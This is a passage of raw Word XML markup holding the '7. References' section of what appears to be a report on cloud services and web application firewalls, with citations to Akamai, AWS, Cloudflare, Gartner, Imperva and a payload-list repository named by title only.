      </w:r>
    </w:p>
    <w:p w14:paraId="42A44E20" w14:textId="6A8AA440" w:rsidR="000E2933" w:rsidRPr="00DE6606" w:rsidRDefault="000E2933" w:rsidP="00BD5AA5">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE6606">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="610D1C5E" w14:textId="26EA8EC3" w:rsidR="000E2933" w:rsidRPr="00DE6606" w:rsidRDefault="009010C8" w:rsidP="00564269">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
      </w:pPr>
      <w:bookmarkStart w:id="82" w:name="_Toc71138517"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">7. </w:t>
      </w:r>
      <w:r w:rsidR="000E2933" w:rsidRPr="00DE6606">
        <w:t>References</w:t>
      </w:r>
      <w:bookmarkEnd w:id="82"/>
    </w:p>
    <w:p w14:paraId="07201B99" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Akamai. (2020). Financial Services - Hostile Takeover Attempts. </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>State of the Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">(1). https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/soti-security-financial-services-hostile-takeover-attempts-report-2020.pdf. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75CF6424" w14:textId="48411963" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Akamai. (</w:t>
      </w:r>
      <w:r w:rsidR="00943C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What does CDN stand for? CDN Definition</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.akamai.com/us/en/cdn/what-is-a-cdn.jsp. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3041B5AF" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">AWS. (2021). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Overview of Amazon Web Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. AWS Whitepaper. https://d1.awsstatic.com/whitepapers/aws-overview.pdf. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E3D71C" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Box, P. (2020, January 9). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SQL Injection Payload List</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. GitHub. https://github.com/payloadbox/sql-injection-payload-list. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C03386" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Catchpoint. (2021). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Global Monitoring Network</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.catchpoint.com/global-node-network. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06857A2B" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">CDNetworks. (2020). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>State of the Web Security</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.cdnetworks.com/wp-content/uploads/2020/11/CDNetworks-State-Of-web-Security-H1-2020.pdf. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AC78F8" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Chou, D. (2018, September 28). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloud Service Models (IaaS, PaaS, SaaS) Diagram</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://dachou.github.io/2018/09/28/cloud-service-models.html. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A9A885" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cloud Security Alliance. (2017). Security Guidance for Critical Areas of Focus in Cloud Computing v4.0. https://downloads.cloudsecurityalliance.org/assets/research/security-guidance/security-guidance-v4-FINAL.pdf. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB2DBC6" w14:textId="38F03EE4" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloudflare. (</w:t>
      </w:r>
      <w:r w:rsidR="00943C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web Application Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.cloudflare.com/waf/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA5EC4F" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cyberthreat Defense Report 2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. CyberEdge Group. (2021, April 20). https://cyber-edge.com/cdr/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17676114" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gartner. (2020, October 13). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Magic Quadrant for Web Application Firewalls</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Gartner. https://www.gartner.com/doc/reprints?id=1-24F0FLTE&amp;ct=201021&amp;st=sb. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7403EF97" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gartner. (2020, September 1). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Magic Quadrant for Cloud Infrastructure and Platform Services</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Gartner. https://www.gartner.com/doc/reprints?id=1-1ZDZDMTF&amp;ct=200703&amp;st=sb. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="560B5DF4" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Gartner. (2021). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloudflare WAF Reviews</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Gartner. https://www.gartner.com/reviews/market/web-application-firewalls/vendor/cloudflare/product/cloudflare-waf. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D203B47" w14:textId="09C164DE" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Harvard. (</w:t>
      </w:r>
      <w:r w:rsidR="00943C00">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2021</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloud Service Providers</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://rmas.fad.harvard.edu/cloud-service-providers. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="288EB9E8" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Imperva. (2020). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Cloud WebApplication Firewall</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.imperva.com/resources/datasheets/Imperva_Cloud-WAF_Capability-Brief-2020.pdf. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067ECC15" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Imperva. (2020). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Web Protection - Introduction</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://docs.imperva.com/bundle/cloud-application-security/page/introducing/cloud-waf.htm. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4967EA17" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Imperva. (2020, June 10). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What is OSI Model: 7 Layers Explained: Imperva</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Learning Center. https://www.imperva.com/learn/application-security/osi-model/. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C517E" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">MarketsandMarkets Research. (2020). </w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SOC as a Service Market by Component, Service Type (Prevention, Detection, &amp; Incident Response), Offering Type (Fully Managed &amp; Co-managed), Application Area (Network Security &amp; Endpoint Security), Industry Vertical, and Region - Global Forecast to 2025</w:t>
      </w:r>
      <w:r w:rsidRPr="00BB52C4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. https://www.marketsandmarkets.com/Market-Reports/soc-as-a-service-market-31262563.html. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1F2025" w14:textId="77777777" w:rsidR="00A62118" w:rsidRPr="00BB52C4" w:rsidRDefault="00A62118" w:rsidP="00A62118">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:ind w:left="567" w:hanging="567"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
